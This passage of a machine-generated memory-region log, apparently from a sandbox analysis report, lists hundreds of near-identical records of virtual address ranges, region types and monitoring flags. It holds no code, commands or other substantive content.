pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16926 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16929 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16930 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16933 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16934 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16937 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16938 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16941 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16942 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16943 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16944 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16945 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16946 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16949 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16950 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16953 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16954 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16957 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16958 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16961 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16962 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16965 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16966 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16969 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16970 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16971 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16972 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16973 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16976 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16977 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16980 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16981 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16985 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16986 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16987 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16988 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16992 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16993 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16994 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16995 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16996 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16999 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17000 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17001 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17002 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17003 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17004 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17005 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17006 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17007 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17008 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17009 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17010 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17011 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17012 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17013 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17016 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17017 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17018 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17019 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17020 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17021 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17024 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17025 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17026 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17027 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17028 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17031 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17032 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17033 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17034 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17035 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17036 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17037 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17038 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17039 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17040 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17041 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17042 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17044 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17045 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17048 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17049 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17052 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17053 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17054 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17056 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17057 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17060 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17061 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17064 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17065 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17068 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17077 start_va = 0x1e80000 end_va = 0x1e81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17083 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17084 start_va = 0x1e80000 end_va = 0x1e86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17085 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 17086 start_va = 0x1ec0000 end_va = 0x1ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 17087 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17088 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17089 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17090 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17091 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17092 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17093 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17094 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17095 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17096 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17097 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17098 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17099 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17100 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17101 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17102 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17103 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 17104 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17105 start_va = 0x2360000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 17106 start_va = 0x2360000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002360000" filename = "" Region: id = 17107 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17108 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17109 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17110 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17111 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17112 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 17113 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = 